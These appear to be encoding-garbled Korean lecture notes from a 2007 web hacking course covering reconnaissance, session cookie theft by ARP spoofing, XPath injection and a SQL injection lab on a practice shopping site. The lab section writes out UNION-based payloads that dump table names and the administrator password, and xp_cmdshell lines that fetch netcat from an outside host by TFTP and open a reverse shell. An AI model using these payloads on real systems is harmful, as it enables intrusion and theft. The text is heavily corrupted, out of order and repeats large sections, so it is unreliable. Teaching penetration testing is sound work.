ํด๋ผ์ด์ถํธ์์ ์ ๋ ฅ๋ ๊ฐ์ด ์ ํจ์ฑ ๊ฒ์ฆ๊ณผ์ ์์ด sql ๋ฌธ์ ํฌํจ๋๋ ๊ฒฝ์ฐ
MAIN CAUSE
Impact
์ธ์ฆ์ฐํ
๋ฐ์ดํฐ๋ฒ ์ด์ค ๋คํ ์กฐ์ ์์ฑ ํ๊ดด
DML D์ด ๋ฑ ์์ํ ์ ์๋ ๋ชจ๋ ์์
๋ฐ์ดํฐ๋ฒ ์ด์ค ์ปจํธ๋กค
์์คํ ๋ช ๋ น์ด ์คํ
COUNTERMEASURE
์ ๋ ฅ๊ฐ ๊ฒ์ฆ
์ต์๊ถํ ๋ถ์ฌ(SYSTEMDBMSDatabase)
์ธ์ฆ์ฐํ
์ธ๊ฐ๋ ์ฌ์ฉ์์ ID PW ๋ฅผ ์ ๋ ฅํ์ง ์๊ณ ๋ ์ธ์ฆ์ ์ฐํํ๋ ํ์
ID PW๋ฅผ ๋ชจ๋ฅด๋ ์ํ์์๋ ์ ์ ํ ๊ตฌ์ฑ๋ ๋ฌธ์์ด์ ์ ๋ ฅํ์ฌ ์ธ์ฆ์ ์ฐํํ๋ ๊ฒ์ด ๊ฐ๋ฅ
์ ๋ ฅ๋ ๋ฌธ์์ด์ SQL ๋ฌธ์ ์ผ๋ถ๋ก ์ฝ์ ์ด ๋์ด ์คํ๋จ
์ธ์ฆ ์ฐํ์ ์ฌ์ฉ๋๋ ์ ๋ ฅ๊ฐ์
๋ฌธ๋ฒ์ ์ค๋ฅ๋ฅผ ์ํค์ง ์์์ผ ํจ
WHERE์ ์ ์กฐ๊ฑด์ด ํญ์ ์ฐธ์ด ๋๋๋ก ์กฐ์
์น ์ ํ๋ฆฌ์ผ์ด์ ์ ์ผ๋ฐ์ ์ธ ์ธ์ฆ ์ ์ฐจ
1IDPW ์ ๋ ฅ
2SQL Query ์์ฑ
3DATABASE์ ์ฟผ๋ฆฌ ์ ์ก
4DATABASE์์ ์ฟผ๋ฆฌ๋ฌธ ์คํ
5๋ฐํ๋๋ RETURN๊ฐ์ ๋ฐ๋ผ ์ธ์ฆ์ฌ๋ถํ๋จ
SQL INJECTION ์ ์ฐจ
DB ์คํค๋งํ์ (DBTABLECOLUMN ํ๊ฒฝ์ ๋ณด๋ฑ ํ์
๋ฐ์ดํฐ๋ฒ ์ด์ค ์ด๋ฆ ํ์
ํ ์ด๋ธ์ด๋ฆ ํ์
์ปฌ๋ผ์ด๋ฆ ํ์
๋ชจ๋ SQL INJECTION์ ์ ๋ ฅ๊ฐ์ ๋ํ ์ ํจ์ฑ ๊ฒ์ฆ์ ํ์ง ์๊ธฐ ๋๋ฌธ์ ๋ฐ์ํ๋ค ์๋ฌ๋ฅผ ์ ๋ํ์ฌ ํ๋์ ์ ๋ณด๋ฅผ ๋์ถ์ํจ๋ค
DBMS ๊ฐ ์ ์ ํ ๊ถํ์ ๊ฐ์ง๊ณ ์๋ ๊ฒฝ์ฐ ๋ ์ง์คํธ๋ฆฌ์ ์ ๊ทบํ๋ ๊ฒ์ด ๊ฐ๋ฅ
DBMS๊ฐ ์ ์ ํ ๊ถํ์ ๊ฐ์ง๊ณ ์๋ ๊ฒฝ์ฐ ์ฟผ๋ฆฌ๋ฅผ ํตํ ์๋น์ค ์ ์ด๊ฐ ๊ฐ๋ฅ
OYES MALL (SQL INJECTION์ ์ด์ฉํ ๊ด๋ฆฌ์ ๊ถํ ํ๋ ์ค์ต
ํ๊ฒฝ์(2000ASPMS-SQL2000)
์ค๋น๋ ์ผํ๋ชฐ์ด๋ค
์ฒซ๋ฒ์งธ ๋ฐฉ๋ฒ
Web Hacking 3์ผ์ฐจ
2007๋ 10์ 25์ผ ๋ชฉ์์ผ
์ค์ 1200
kisec ์นํดํน ๋ ธํธํ๊ธฐ ํ์ด์ง 15
group by(user_id) -- ๋ฅผ ์ด์ฉํด ํ ์ด๋ธ์ ์์๋ธ๋ค
Member ํ ์ด๋ธ์์์๋ num์ด๋ผ๋ ์ปฌ๋ผ์ ํ ํด๋๋ค
kisec ์นํดํน ๋ ธํธํ๊ธฐ ํ์ด์ง 16
union select from members where user_id like o ํด๋ด๋ผ ๋ก๊ทธ์ธ ๋ ๊ฑฐ๋ค
๋๋ฒ์งธ ๋ฐฉ๋ฒ
์ฃผ์๋ก์กฐํ ๋ถ๋ถ์ SQL INJECTION์ ํ์๋ค
$UNION SELECT 1234TABLE_NAME FROM INFORMATION_SCHEMATABLES-- ์๊ฐ์ด ์ง์๋ฅผ ํ๋ฉด ํ ํด๋ธ๋ค
kisec ์นํดํน ๋ ธํธํ๊ธฐ ํ์ด์ง 17
์ฐ๋ฆฌ๋ members ๋ผ๋ ํ ์ด๋ธ์ด ์กด์ฌํ๋ ๊ฒ์ ๋ณผ์ ์์ ๊ฒ์ด๋ค
$UNION SELECT 1234 COLUMN_NAME FROM INFORMATION_SCHEMACOLUMNS WHERE TABLE_NAME= members --
Members์ ๋ํ ์ปฌ๋ผ์ ํ ํด๋ธ๋ค
$ or 1=(select top 1 user_id from members)--
User id์ ์ปฌ๋ผ์ top 1 ์ธ๊ฒ์ ํ ํด๋ธ๋ค
union select 1234 user_idpasswd from members where user_id=oyes --
kisec ์นํดํน ๋ ธํธํ๊ธฐ ํ์ด์ง 18
์ผ์~password ๊ฐ oyesmall ์ด๋ผ๋ค ์ค์ต ๋
File Uploading
$$ exec masterxp_cmdshell tftp -i 2112406869 get ncexe nc2000exe --
$$ exec masterxp_cmdshell nc1000exe 2112406877 7777 -e cmdexe --
์์ฃผ ๊ฐ๋จํ๋ค
$$ exec masterxp_cmdshell tftp -i 2112406869 get ncexe nc6249exe ampamp nc -e cmdexe 2112406877 6249 --
kisec ์นํดํน ๋ ธํธํ๊ธฐ ํ์ด์ง 19
IIS ASPSESSIONID
APACHE SESSIONID
TOMCAT JSESSIONID
PHP PHPSESSID
๊ธฐํ JServerSessionID
JWSESSIONID
SESSID
SESSION
SID
SESSION_ID
์ธ์
WASWS ๋ง๋ค ๋ค๋ฅด์ง๋ง ๋ณดํต 10๋ถ20๋ถ ์ค์ ์
์ฌ์ฉ์๊ฐ ๋น์ ์ ๋ก๊ทธ์์ ํ๊ฑฐ๋ Request ์์ฒญ ์์ ์ ์ ํ์ ์์ ๊ฐ ์ด๊ณผ ํ ํด๋น ์ธ์ ID๋ ์๋ฉธ
์ธ์ ๋ ์ฟ ํค์ ๊ฐ์ ์ ํจ๊ธฐ๊ฐ ์์
๊ด๋ ฆ ISSUE
์ด๊ธฐ์ธ์ ๊ฐ์ฒด ์์ฑ์ ํด๋ผ์ด์ถํธ์ IP ๋ฉ์ธ๋ณด๋SN ํ๋๋์คํฌ SN๋ฑ Uniq ํ ๊ฐ์ ์ค์ ํ ํ ๋งค ํ์ด์ง๋ง๋ค
์ธ์ฆ๋น๊ต๋ฅผ ํตํด ๊ณต๊ฒฉ์ ์๋ฐฉํ ์ ์์
์ฌ์ฉ์ ์์์กฐ์์ ํตํ ๊ณต๊ฒฉ์๋
์ธ์ ์ด๊ธฐ ์์ฑ์๋ง๋ค ์๋ก์ด ID๋ฅผ ์์ฑ
์ฌ์๊ณต๊ฒฉ
์ค์ต
Cookie๊ฐ์ ์ค๋ํ ํด์ ์๋๋ฐฉ Cookie๊ฐ์ผ๋ก ์๋๋ฐฉ ๊ณ์ ์ผ๋ก ๋ก๊ทธ์ธ
์ค์ตํ๊ฒฝWinArpSpoof or CainampAbel or wireshark
Wireshark๋ก arp ์คํธํ์ ํด์ ํจํท์ด ๋์๊ฒ ๋๊ฒจ์ค๊ฒ ๋ง๋๋ค
kisec ์นํดํน ๋ ธํธํ๊ธฐ ํ์ด์ง 6
ํ๋ฉด๊ณผ ๊ฐ์ด wireshark๋ฅผ ์ค๋นํ๋ค
์คํธํ์ ํ๊ณ ์์ผ๋ฉด ์๋๋ฐฉ ์ธก์์ wwwnavercom ์ ๋ก๊ทธ์ธ์ ํ๊ฒ ๋๋ฉด ํจํท์ด ๋ ๋ผ ์ค๊ฒ ๋๋ค ์ฌ๊ธฐ์ ์ฐ๋ฆฌ๋
๋ก๊ทธ์ธ ๊ด๋ ฆ ํจํท ๋ง ์์๋ณด๊ธฐ ์ํด ํํฐ์ httprequestmethod == POST ๋ฅผ ์น๋ค
๋ค์๊ณผ ๊ฐ์ด ๋์ฌ ๊ฒ์ด๋ค Set-Cookie๋ถ๋ถ์ ๋ณต์ฌํด ๋๋ค
kisec ์นํดํน ๋ ธํธํ๊ธฐ ํ์ด์ง 7
๋ค์๊ณผ ๊ฐ์ด ์ค์ ์ ์กฐ๊ธ ๋ณ๊ฒฝ ์์ผ์ค๋ค
๋ค์๊ณผ ๊ฐ์ด ์ ํ ์ ํด๋๋ค
๊ทธ๋ผ ๋ค์๊ณผ ๊ฐ์ด ๋ก๊ทธ์ธ์ด ๋๋ ์ฅ๋ฉด์ ๋ณผ ์ ์์ ๊ฒ์ด๋ค
์ฌ๊ธฐ์๋ XSS๋ฅผ ์ฌ์ฉํ์ง ์๊ณ Network์์์ Cookie๊ฐ์ ํ์ณ์ ๊ณ์ ์ ํ์ณ ๋ณด์๋ค
kisec ์นํดํน ๋ ธํธํ๊ธฐ ํ์ด์ง 8
XML ํน์ง
๋ฌธ์์ ๋ด์ฉ๊ณผ ๋์์ธ์ด ์์ ํ ๋ถ๋ฆฌ
๋ฌธ์๊ตฌ์กฐ๋ XML๋ก ํ๋ฆฌ์ ํ ์ด์ ์ XSL์ ํตํด
๋ค์ํ ๋ฐฉ์์ ๋งํฌ ๊ธฐ๋ฅ ์ ๊ณต
ํ์คํ๋ DTD์ ํตํด ๋ชจ๋ ๋ถ์ผ์ ์ฌ์ฉ๊ฐ๋ฅ
DOM(Document Object Model)
SAX(Simple API for XML)
XML๊ตฌ์กฐ2๊ฐ์ง ๋ํ์ ๋ชจ๋ธ์กด์ฌ
๊ตฌ์ฑ์์ ์ค๋ช
์๋ฆฌ๋จผํธ ๋งํฌ์ ํ๊ทธ์ ๊ทธ ์์ ํฌํจ๋ ๋ด์ฉ
๋น ์๋ฆฌ๋จผํธ ๋ด์ฉ์ ํฌํจํ์ง ์๋ ๋น ์๋ฆฌ๋จผํธ
๋ฃจํธ ์๋ฆฌ๋จผํธ ๋ฌธ์๋ด ๋ชจ๋ ์๋ฆฌ๋จผํธ์ ๋ด์ฉ์ ํฌํจํ๊ณ ์๋ XML ๋ฌธ์์ ์๋ฆฌ๋จผํธ
์์ฑ ์๋ฆฌ๋จผํธ์ ํฌํจ๋์ด ์ถ๊ฐ์ ์ธ ์ ๋ณด๋ฅผ ์ ๊ณต
ltimg src=balbalbalgtbalbalballtimggt
์ํฐํฐ ํ ์คํธ ๋ฐ์ด๋๋ฆฌ๋ฐ์ดํฐ ๋น ์์คํฌ ๋ฌธ์๋ฅผ ์ ์ฅํ๋๋ฐ ์ฌ์ฉ
์ฒ๋ฆฌ๋ช ๋ น ์ ์ฒด ๋ฌธ์๋ ๋ฌธ์์ ์ผ๋ถ๋ฅผ ์ฒ๋ฆฌํ๋ ์์ฉํ๋ก๊ทธ๋จ๊ณผ ์ฐ๊ฒฐํด ์ฃผ๋ ๋ช ๋ น์ด lt gt
์ฃผ์ XML ํ๋ก์ธ์๊ฐ ํด์ํ์ง ์๋ ์ค๋ช ๋ฌธ
lt-- --gt
CDATA์น์ ํน์ํ ๋ฌธ์๋ฅผ ์ผ๋ฐ ํ ์คํธ๋ก ์ธ์ํ๋๋ก ํ๋ ํ๊ธฐ๋ฒ
lt[CDATA[hellipstring]]gt
Xpath
Xml ๋ฌธ์์ ๋ํ ์ง์์ถ์ด
SQL๋ฌธ์ ํน์ ํ ์ด๋ธ์ ํ๊ณผ ์ด์ ์ ํ
Xpath๋ ํน์ XML๋ฌธ์์ ๋ ธ๋์ ๋ ธ๋์ ์ ์ ํ
๊ด๋ ฆ Issue
์)bookbook[ISBN=1111 or 1=1]
๋ชจ๋ book ๋ ธ๋๋ค์ ์ ๊ทบ๊ฐ๋ฅ
Xpath๊ณต๊ฒฉ
๋ํ ํ์ด๋ก๋ ๊ณต๊ฒฉ(like DOS)
XML์ ๋ ธ๋์ ์์ฑ์ด ์ค์ฒฉ ์ ์ถ๋ ์ ์๋ค๋ ์ ์ ์ ์ฉ
ํน์ ๋ ธ๋์์ ๋์ผ ๋ ธ๋๋ช ๋ฐ๋ณต์ ์ถ์์ฑ ๋ฌดํ์ ์ถ
์ฌ๊ท ํ์ด๋ก๋ ๊ณต๊ฒฉ
`or loginid(nodeLoginID())=LoginID or a=b
07๋ ํดํน๋ฐฉ์ด๋ํ๋ฌธ์
WebService
์ ์๋คํธ์ํฌ์์์ ์ ๊ทบ ๊ฐ๋ฅํ ์ํํธ์จ์ด ๊ธฐ๋ฅ๋จ์๋ก ํ๋ซํผ ํ๋ก๊ทธ๋๋ฐ ์ถ์ด ๋ฐ ์ปดํฌ๋ํธ ๋ชจ๋ธ์ ๋
๋ฆฝ์ ์ธ ๊ธฐ์ ๋ก ๋ง๋ค์ด์ง ์ํํธ์จ์ด
์น ํดํน ๊ณต๊ฒฉ ์ ์ฐจ
FootPrinting Scanning Enumeration
PllferingEscalatingPrivledge
GainingAccess
CreatingBack Doors
CoveringTracks
Web Hacking 2์ผ์ฐจ
2007๋ 10์ 23์ผ ํ์์ผ
์ค์ 934
kisec ์นํดํน ๋ ธํธํ๊ธฐ ํ์ด์ง 9
์น ํดํน ๊ณต๊ฒฉ ์ ์ฐจ
FootPrinting Scanning Enumeration
PllferingEscalatingPrivledge
GainingAccess
CreatingBack Doors
CoveringTracks
๊ณต๊ฒฉ์ ์ฐจ
์ ๋ณด์์ง
Profiling
๋ถ์
Analysis
๊ณต๊ฒฉ
AttackEcploit
hellip
์ฌํ๊ณตํ
๊ฒ์์์ง
FootPrinting
PortScan
Web Site ๋ฏธ๋ฌ๋ง
Web ๊ตฌ์กฐ๋ถ์
์๋ฏธ์๋ ์ ๋ณด๋ก ๊ฐ๊ณต
Account ์์ง
OS์ ๋ณด์ทจ์ฝ์
ํฌํธ๋ณ์๋น์ค์ทจ์ฝ์
์ ์ฒด๊ตฌ์กฐ์์ค์ฃผ์
์ฟ ํค๋ฑ ๋ถ์
์ ๋ณด์ ๊ทบ๊ฑฐํ ๊ณต๊ฒฉ
BF Guessing
OSNetwork Service
Exploitation
๊ถํ์์น
OWASPWASC๋ฑ์ ์ํ ๊ณต๊ฒฉ
๋ณด๊ณ ์
1์ ๋ณด์์ง
์ฌํ๊ณตํ
๋๋ฉ์ธ ์ ๋ณด IP Block ์ ๋ณด
Whois
Dig
Whosip
Netcraft
๊ธฐ๋ณธ์ ๋ณด
httpwebarchiveorg
Google Cache
Web Archive
httpjohnnyihackstuffcom
์ฌ์ ์ฌ(googledorkpdf)
Google Dork
Google hacking DB ์ฌ์ฉ
Google API Key(ํค ๋ฐ๊ธ ํ์ง)
SiteDigger Wikto
๊ฒ์์์ง(No-Tech Hacking)
๊ตฌ๊ธ ํดํน ํค์๋ ์ ๊ณต ์ฌ์ดํธ
Footprinting Web Server
kisec ์นํดํน ๋ ธํธํ๊ธฐ ํ์ด์ง 10
AFD(Acitive Filter Detection)
ICMP TTL๊ฐ์ ์กฐ์ ํด๊ฐ๋ฉฐ ์น ์๋ฒ ํ์ง
netcraftcom
Stealth Scan-sS
Normal Scan-sT-sU
Network Services Version Scan-sV
OSDetection-O-A
DoNotPing_P0
Idle scan
IDS์ฐํ
httpunicornscanorg
Unicorn scan -mT -p -v -r 2501921681024q
Unicornscan
Nc
jikto
Port Scan(Port Mapping)
httTrack
Web Site Mirroring
kisec ์นํดํน ๋ ธํธํ๊ธฐ ํ์ด์ง 11
-grepegrep awksedsortuniq(moreheadless)๋ฑ ํ์ฉ
Mirroring ํ ์ ์ ๋ถ์
balckwindow
InteliTamper
Wikto
Web๊ตฌ์กฐ ๋ถ์(๋ฐ์๋)
Httpwatch
TamperlE
Cooxie
LiveHttpHeaders(firefox)
Command line tool(nccurlopenssl)
Manual Analysis
ParosWebscrabFidderBurpIntruder
SoftwareProxy
Web๊ตฌ์กฐ๋ถ์(์์์ )
๊ด๋ฆฌ์ํ์ด์ง
์๋ฃ์ค(web shell)
ํต๊ณ ์ํ ํ์ด์ง
ํ์๋ฑ๋ก์ฐํธ๋ฒํธ ์กฐํ(์ธ์ ์ ๊ณต๊ฒฉ)
(์ธ์ ์ ์ ์ ๋ ฅ๊ฐ์ ๋ฃ์์๋ ๊ฒฐ๊ณผ๋ฅผ ๋ฟ๋ ค์ฃผ๋ ํ์ด์ง๋ฅผ ์ฐพ์์ผํ๋ค)์๋ณด์ฌ์ฃผ๋๊ฑด ๋ธ๋ผ์ธ๋ ์ธ์ ์
์ํธ๋ถ์ค(์ํธ ํ๋ ์์)
์ ๋ณด์์ (์ํ์์ง์์น๊ธฐํ)
ํ์๊ฐ์ ํ์ด์ง
๊ฒฐ์ ํ์ด์ง
Basic Banner Garbbing
Http resonse ํค๋ ์์
Http resonse ํค๋ ์กด์ฌ ์ ๋ฌด
Http resonse ํค๋์ ํน์ ๊ฐ
Tracehead ๋ฑ์ ๋ํ ์์ดํ ์๋ต
๋ฐ์ดํฐ์์ด ์ ์กํ put์ ๋ํ์๋ต
kisec ์นํดํน ๋ ธํธํ๊ธฐ ํ์ด์ง 12
Tracehead ๋ฑ์ ๋ํ ์์ดํ ์๋ต
๋ฐ์ดํฐ์์ด ์ ์กํ put์ ๋ํ์๋ต
Unexpercted Method ์ ์ก
๋์ผ์์ฒญ ๋ฐ๋ณต ์ ์ก
์ทจ์ฝ์ ์ค์บ(system)
Xscan
Nessus
n-stealth security scanner
์ทจ์ฝ์ ์ค์บ(Web Server amp WAS amp Web App)
APP SCANNER
ACUNETIX
NSTALKER SCANNER
์ค์บ ISSUE
BASIC DIGEST NTML CERT
FORM-BASED
์ธ์ฆ์ ๋ณด ์ค์
์ค์บ ๊ฐ๋(๋ฉํฐ ์ปค๋ฅ์ ํ์์์ ๊ณต๊ฒฉ๋ชจ๋๋น๊ณต๊ฒฉ๋ชจ๋)
๋ถ์
์๋ฏธ์๋ ์ ๋ณด๋ก ๊ฐ๊ณต
ACCOUNT ์์ง
OS์ ๋ณด์ ๋ฐ๋ฅธ ์ทจ์ฝ์ ์์ง
ํฌํธ๋ณ ์๋น์ค ์ทจ์ฝ์
์น์๋ฒ ์ ์ฒด๊ตฌ์กฐ ๋ถ์
์ฃผ์
ํ๋ ํ๋
์์ค๋ถ์
์ฟ ํค๋ถ์
์ธ์ ID์์ฑ ์ทจ์ฝ์ ๋ถ์
๊ณต๊ฒฉ
์ ๋ณด์ ๊ทบ๊ฑฐํ ๊ณต๊ฒฉ
๋ฌด์์ ๊ณต๊ฒฉ
์ฌ์ ๊ณต๊ฒฉ
๊ณต๊ฒฉ์ด์
์์ง๋ ACCOUNT ์ ๋ณด๋ฅผ์ด์ฉ
OSNETWORK SERVICE ๊ณต๊ฒฉ
WEBSERVER WEBAPP SERVER WEBAPPLICATION
SQLISCANNER
๊ถํ ์์น
์ํ
ํ์์ ๋ณด ์์
Cookie Stealing
CSRF
์์ง
CSRF
CSRF๋ฅผ ํตํด DMZ์์ญ์ ์ ์ํ ๊ด๋ฆฌ์์๊ฒ ๋ด๋ถ ZONE์ชฝ์ผ๋ก ๊ฐ์ REQEUST๋ฅผ ํ๋๋ก ์กฐ์ ๊ฐ๋ฅ
kisec ์นํดํน ๋ ธํธํ๊ธฐ ํ์ด์ง 13
์ ์ ์กฐ๊ฑด์ ๋ด๋ถ๋ง์ IP APPLICATION PARAMETERS ๋ฅผ ๋ชจ๋ ์๊ณ ์์ ๊ฒฝ์ฐ
CSRF๋ฅผ ํตํด DMZ์์ญ์ ์ ์ํ ๊ด๋ฆฌ์์๊ฒ ๋ด๋ถ ZONE์ชฝ์ผ๋ก ๊ฐ์ REQEUST๋ฅผ ํ๋๋ก ์กฐ์ ๊ฐ๋ฅ
OWASPWASC
์์์
์น ์ดํ๋ฆฌ์ผ์ด์ ์ทจ์ฝ์ ๊ณต๊ฒฉ
์ํ๋์ ๋ฐ๋ผ ๊ณต๊ฒฉ
๊ฐ์ฉ์ฑ์ ๋จ์ดํธ๋ฆฌ๋ ๊ณต๊ฒฉ์ ์ธ
์๋ฒ์ shellํ๋ or๊ด๋ฆฌ์ ์ํธ ํ๋
๋ฐ์ดํฐ ์ด๋ ํ์ฉ๊ธ์ง
Ethical Hacking์ธ ๊ฒฝ์ฐ ๊ณ ๊ฐ์ ์๊ตฌ์ฌํญ ๋ฐ์
์คํ์ ๊ฑฐ
์น ์ทจ์ฝ์ ์ค์บ๋ ๊ฒฐ๊ณผ ๋ถ์
ONE WAY WEB HACKING ์ฝ์ด๋ณด๊ธฐ
kisec ์นํดํน ๋ ธํธํ๊ธฐ ํ์ด์ง 14
SQL INJECTION
GETPOST ํ๋ผ๋ฏธํฐ HTTP REQUEST ํ๋ผ๋ฏธํฐ ์ฟ ํค ๊ฐ
๊ธฐํ ์๋ฒ์์ ์ฒ๋ฆฌํ๋ ๋ชจ๋ ํด๋ผ์ด์ถํธ ๊ฐ
ํด๋ผ์ด์ถํธ ์ ๋ ฅ ๊ฐ ์ ํ
ํด๋ผ์ด์ถํธ์์ ์ ๋ ฅ๋ ๊ฐ์ด ์ ํจ์ฑ ๊ฒ์ฆ๊ณผ์ ์์ด sql ๋ฌธ์ ํฌํจ๋๋ ๊ฒฝ์ฐ
MAIN CAUSE
Impact
์ธ์ฆ์ฐํ
๋ฐ์ดํฐ๋ฒ ์ด์ค ๋คํ ์กฐ์ ์์ฑ ํ๊ดด
DML D์ด ๋ฑ ์์ํ ์ ์๋ ๋ชจ๋ ์์
๋ฐ์ดํฐ๋ฒ ์ด์ค ์ปจํธ๋กค
์์คํ ๋ช ๋ น์ด ์คํ
COUNTERMEASURE
์ ๋ ฅ๊ฐ ๊ฒ์ฆ
์ต์๊ถํ ๋ถ์ฌ(SYSTEMDBMSDatabase)
์ธ์ฆ์ฐํ
์ธ๊ฐ๋ ์ฌ์ฉ์์ ID PW ๋ฅผ ์ ๋ ฅํ์ง ์๊ณ ๋ ์ธ์ฆ์ ์ฐํํ๋ ํ์
ID PW๋ฅผ ๋ชจ๋ฅด๋ ์ํ์์๋ ์ ์ ํ ๊ตฌ์ฑ๋ ๋ฌธ์์ด์ ์ ๋ ฅํ์ฌ ์ธ์ฆ์ ์ฐํํ๋ ๊ฒ์ด ๊ฐ๋ฅ
์ ๋ ฅ๋ ๋ฌธ์์ด์ SQL ๋ฌธ์ ์ผ๋ถ๋ก ์ฝ์ ์ด ๋์ด ์คํ๋จ
์ธ์ฆ ์ฐํ์ ์ฌ์ฉ๋๋ ์ ๋ ฅ๊ฐ์
๋ฌธ๋ฒ์ ์ค๋ฅ๋ฅผ ์ํค์ง ์์์ผ ํจ
WHERE์ ์ ์กฐ๊ฑด์ด ํญ์ ์ฐธ์ด ๋๋๋ก ์กฐ์
์น ์ ํ๋ฆฌ์ผ์ด์ ์ ์ผ๋ฐ์ ์ธ ์ธ์ฆ ์ ์ฐจ
1IDPW ์ ๋ ฅ
2SQL Query ์์ฑ
3DATABASE์ ์ฟผ๋ฆฌ ์ ์ก
4DATABASE์์ ์ฟผ๋ฆฌ๋ฌธ ์คํ
5๋ฐํ๋๋ RETURN๊ฐ์ ๋ฐ๋ผ ์ธ์ฆ์ฌ๋ถํ๋จ
SQL INJECTION ์ ์ฐจ
DB ์คํค๋งํ์ (DBTABLECOLUMN ํ๊ฒฝ์ ๋ณด๋ฑ ํ์
๋ฐ์ดํฐ๋ฒ ์ด์ค ์ด๋ฆ ํ์
ํ ์ด๋ธ์ด๋ฆ ํ์
์ปฌ๋ผ์ด๋ฆ ํ์
๋ชจ๋ SQL INJECTION์ ์ ๋ ฅ๊ฐ์ ๋ํ ์ ํจ์ฑ ๊ฒ์ฆ์ ํ์ง ์๊ธฐ ๋๋ฌธ์ ๋ฐ์ํ๋ค ์๋ฌ๋ฅผ ์ ๋ํ์ฌ ํ๋์ ์ ๋ณด๋ฅผ ๋์ถ์ํจ๋ค
DBMS ๊ฐ ์ ์ ํ ๊ถํ์ ๊ฐ์ง๊ณ ์๋ ๊ฒฝ์ฐ ๋ ์ง์คํธ๋ฆฌ์ ์ ๊ทบํ๋ ๊ฒ์ด ๊ฐ๋ฅ
DBMS๊ฐ ์ ์ ํ ๊ถํ์ ๊ฐ์ง๊ณ ์๋ ๊ฒฝ์ฐ ์ฟผ๋ฆฌ๋ฅผ ํตํ ์๋น์ค ์ ์ด๊ฐ ๊ฐ๋ฅ
OYES MALL (SQL INJECTION์ ์ด์ฉํ ๊ด๋ฆฌ์ ๊ถํ ํ๋ ์ค์ต
ํ๊ฒฝ์(2000ASPMS-SQL2000)
์ค๋น๋ ์ผํ๋ชฐ์ด๋ค
์ฒซ๋ฒ์งธ ๋ฐฉ๋ฒ
Web Hacking 3์ผ์ฐจ
2007๋ 10์ 25์ผ ๋ชฉ์์ผ
์ค์ 1200
kisec ์นํดํน ๋ ธํธํ๊ธฐ ํ์ด์ง 15
group by(user_id) -- ๋ฅผ ์ด์ฉํด ํ ์ด๋ธ์ ์์๋ธ๋ค
Member ํ ์ด๋ธ์์์๋ num์ด๋ผ๋ ์ปฌ๋ผ์ ํ ํด๋๋ค
kisec ์นํดํน ๋ ธํธํ๊ธฐ ํ์ด์ง 16
union select from members where user_id like o ํด๋ด๋ผ ๋ก๊ทธ์ธ ๋ ๊ฑฐ๋ค
๋๋ฒ์งธ ๋ฐฉ๋ฒ
์ฃผ์๋ก์กฐํ ๋ถ๋ถ์ SQL INJECTION์ ํ์๋ค
$UNION SELECT 1234TABLE_NAME FROM INFORMATION_SCHEMATABLES-- ์๊ฐ์ด ์ง์๋ฅผ ํ๋ฉด ํ ํด๋ธ๋ค
kisec ์นํดํน ๋ ธํธํ๊ธฐ ํ์ด์ง 17
์ฐ๋ฆฌ๋ members ๋ผ๋ ํ ์ด๋ธ์ด ์กด์ฌํ๋ ๊ฒ์ ๋ณผ์ ์์ ๊ฒ์ด๋ค
$UNION SELECT 1234 COLUMN_NAME FROM INFORMATION_SCHEMACOLUMNS WHERE TABLE_NAME= members --
Members์ ๋ํ ์ปฌ๋ผ์ ํ ํด๋ธ๋ค
$ or 1=(select top 1 user_id from members)--
User id์ ์ปฌ๋ผ์ top 1 ์ธ๊ฒ์ ํ ํด๋ธ๋ค
union select 1234 user_idpasswd from members where user_id=oyes --
kisec ์นํดํน ๋ ธํธํ๊ธฐ ํ์ด์ง 18
์ผ์~password ๊ฐ oyesmall ์ด๋ผ๋ค ์ค์ต ๋
File Uploading
$$ exec masterxp_cmdshell tftp -i 2112406869 get ncexe nc2000exe --
$$ exec masterxp_cmdshell nc1000exe 2112406877 7777 -e cmdexe --
์์ฃผ ๊ฐ๋จํ๋ค
$$ exec masterxp_cmdshell tftp -i 2112406869 get ncexe nc6249exe ampamp nc -e cmdexe 2112406877 6249 --
kisec ์นํดํน ๋ ธํธํ๊ธฐ ํ์ด์ง 19
ํ๋ฉด๊ณผ ๊ฐ์ด wireshark๋ฅผ ์ค๋นํ๋ค
์คํธํ์ ํ๊ณ ์์ผ๋ฉด ์๋๋ฐฉ ์ธก์์ wwwnavercom ์ ๋ก๊ทธ์ธ์ ํ๊ฒ ๋๋ฉด ํจํท์ด ๋ ๋ผ ์ค๊ฒ ๋๋ค ์ฌ๊ธฐ์ ์ฐ๋ฆฌ๋
๋ก๊ทธ์ธ ๊ด๋ ฆ ํจํท ๋ง ์์๋ณด๊ธฐ ์ํด ํํฐ์ httprequestmethod == POST ๋ฅผ ์น๋ค
๋ค์๊ณผ ๊ฐ์ด ๋์ฌ ๊ฒ์ด๋ค Set-Cookie๋ถ๋ถ์ ๋ณต์ฌํด ๋๋ค
kisec ์นํดํน ๋ ธํธํ๊ธฐ ํ์ด์ง 7
๋ค์๊ณผ ๊ฐ์ด ์ค์ ์ ์กฐ๊ธ ๋ณ๊ฒฝ ์์ผ์ค๋ค
๋ค์๊ณผ ๊ฐ์ด ์ ํ ์ ํด๋๋ค
๊ทธ๋ผ ๋ค์๊ณผ ๊ฐ์ด ๋ก๊ทธ์ธ์ด ๋๋ ์ฅ๋ฉด์ ๋ณผ ์ ์์ ๊ฒ์ด๋ค
์ฌ๊ธฐ์๋ XSS๋ฅผ ์ฌ์ฉํ์ง ์๊ณ Network์์์ Cookie๊ฐ์ ํ์ณ์ ๊ณ์ ์ ํ์ณ ๋ณด์๋ค
kisec ์นํดํน ๋ ธํธํ๊ธฐ ํ์ด์ง 8
XML ํน์ง
๋ฌธ์์ ๋ด์ฉ๊ณผ ๋์์ธ์ด ์์ ํ ๋ถ๋ฆฌ
๋ฌธ์๊ตฌ์กฐ๋ XML๋ก ํ๋ฆฌ์ ํ ์ด์ ์ XSL์ ํตํด
๋ค์ํ ๋ฐฉ์์ ๋งํฌ ๊ธฐ๋ฅ ์ ๊ณต
ํ์คํ๋ DTD์ ํตํด ๋ชจ๋ ๋ถ์ผ์ ์ฌ์ฉ๊ฐ๋ฅ
DOM(Document Object Model)
SAX(Simple API for XML)
XML๊ตฌ์กฐ2๊ฐ์ง ๋ํ์ ๋ชจ๋ธ์กด์ฌ
๊ตฌ์ฑ์์ ์ค๋ช
์๋ฆฌ๋จผํธ ๋งํฌ์ ํ๊ทธ์ ๊ทธ ์์ ํฌํจ๋ ๋ด์ฉ
๋น ์๋ฆฌ๋จผํธ ๋ด์ฉ์ ํฌํจํ์ง ์๋ ๋น ์๋ฆฌ๋จผํธ
